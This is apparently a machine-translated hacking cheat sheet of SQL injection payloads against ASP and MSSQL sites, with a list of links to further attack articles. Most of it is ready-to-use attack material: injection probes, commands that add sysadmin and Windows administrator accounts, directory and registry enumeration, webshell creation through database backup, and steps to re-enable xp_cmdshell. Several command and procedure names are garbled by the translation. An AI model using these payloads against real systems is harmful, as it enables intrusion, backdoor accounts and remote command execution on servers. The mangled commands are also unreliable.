Summarize the methods used in ASP Injection

1. Determine whether injection exists.
; And 1 = 1
; And 1 = 2

2. Determine whether it is MSSQL.
; And user> 0

3. Determine the Database System
; And (select count (*) from sysobjects)> 0 MSSQL
; And (select count (*) from msysobjects)> 0 access

4. The injection parameter is a character
And [query condition] And ''='

5. parameters are not filtered during search.
'And [query condition] And' % 25' ='

6. Guess the database
; And (select count (*) from [database name])> 0

7. Guess the field
; And (select count (field name) from database name)> 0

8. Length of records in the guess Field
; And (select top 1 Len (field name) from database name)> 0

9. (1) obtain the ASCII value of a field (ACCESS)
; And (select top 1 ASC (mid (field name, 1, 1) from database name)> 0

(2) Guess the ASCII value of a field (MSSQL)
; And (select top 1 Unicode (substring (field name, 1, 1) from database name)> 0

10. Test the permission structure (MSSQL)
; And 1 = (select is_srvrolemember ('sysadmin '));--
; And 1 = (select is_srvrolemember ('serveradmin '));--
; And 1 = (select is_srvrolemember ('setupadmin '));--
; And 1 = (select is_srvrolemember ('securityadmin '));--
; And 1 = (select is_srvrolemember ('diskadmin '));--
; And 1 = (select is_srvrolemember ('bulkadmin '));--
; And 1 = (select is_member ('db _ owner '));--

11. add MSSQL and system accounts
; Exec master. DBO. sp_addlogin username ;--
; Exec master. DBO. sp_password null, username, password ;--
; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin username ;--
; Exec master. DBO. xp_mongoshell 'net User Username Password/workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. DBO. xp_mongoshell 'net User Username Password/add ';--
; Exec master. DBO. xp_mongoshell 'net localgroup administrators username/add ';--

12. (1) traverse the directory
; Create Table dirs (paths varchar (100), Id INT)
; Insert dirs exec master. DBO. xp_dirtree 'C :/'
; And (select top 1 paths from dirs)> 0
; And (select top 1 paths from dirs where paths not in ('obtained paths ')>)

(2) traverse directories
; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives
; Insert into temp (ID) exec master. DBO. xp_subdirs 'C:/'; -- get the subdirectory list
; Insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- get the directory tree structure of all subdirectories
; Insert into temp (ID) exec master. DBO. xp_shareshell 'Type C:/web/index. asp '; -- view the File Content

13. MSSQL Stored Procedures
Xp_regenumvalues registry Root Key, subkey
; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/run' returns all key values in multiple Record Sets
Xp_regread Root Key, subkey, key value name
; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'commonfilesdir', return the value of the specified key
Xp_regwrite Root Key, subkey, Value Name, value type, Value
There are two value types: REG_SZ and REG_DWORD.
; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'testvaluename', 'reg _ SZ ', 'Hello' write to the Registry
Xp_regdeletevalue Root Key, subkey, Value Name
Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'testvaluename' delete a value
Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/testkey' delete key, including all values under this key

14. MSSQL backup creates webshell
Use Model
Create Table cmd (STR image );
Insert into cmd (STR) values ('<% dim oscript %> ');
Backup database model to disk = 'C:/L. asp ';

15. MSSQL built-in functions
; And (select @ version)> 0 to get the Windows version number
; And user_name () = 'dbo' determine whether the user connected to the current system is sa
; And (select user_name ()> 0 blow the user connected to the current system
; And (select db_name ()> 0 to get the database currently connected

16. Simple webshell
Use Model
Create Table cmd (STR image );
Insert into cmd (STR) values ('<% = server. createobject ("wscript. shell "cmd.exe C (" cmd.exe/C "& request (" C ")). stdout. readall %> ');
Backup database model to disk = 'G:/wwwtest/L. asp ';

When a request is sent, it is used as follows:
Http: // ip/L. asp? C = dir

SQL Injection tianshu-Asp Injection Vulnerabilities (Xiaozhu)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 222

MSSQL cross-Database Query! Night)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 66

Squeeze the last drop of MS SQL
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 309

SQL statement reference and detailed description of record set objects
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 124

SQL Server Stored Procedures
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 314

Use MSSQL backup to create webshell
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 219

SQL _injection advanced application
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 221

Cross-Site SQL injection (laokai ))
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 383

Weird SQL injection (amanl)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 320

Advanced SQL Injection in SQL Server Applications)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 338

How to use SQL injection to traverse directories (sinka QQ: 20355)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 316

SQL Injection skills (translated by demonalex)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 301

SQL database attacks
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 152

SQL Injection Attack Technology (JSW)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 208

SQL _injection advanced application (apachy)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 221

Uncommon SQL injection methods (Guilin veterans)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 231

Backup A shell
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 274

PHP + MySQL injection statement construction (≯ super HEI)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 386

Advanced SQL injection with MySQL (Angel)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 405

L 'injection (my) SQL via PHP
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 420

Oracle SQL language
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 206

Required tools: SQL query analyzer and sqlexec sunx version

1. To remove the xp_cmdshell extension process, use the following statement:

If exists (select * From DBO. sysobjects where id = object_id (n' [DBO]. [xpcmdshell] ') and objectproperty (ID, n' isextendedproc') = 1)
Exec sp_dropextendedproc n '[DBO]. [xp_cmdshell]'

2. To add the xp_cmdshell extension process, use the following statement:

(1) SQL query Analyzer

Sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'

(2) first fill in % s in the format option of sqlexec sunx version, and enter % s in the CMD Option

Sp_addextendedproc 'xp _ external shell', 'sqlsql70. dll'

Remove

Sp_dropextendedproc 'xp _ export shell'

(3) mssql2000

Sp_addextendedproc 'xp _ external shell', 'xp log70. dll'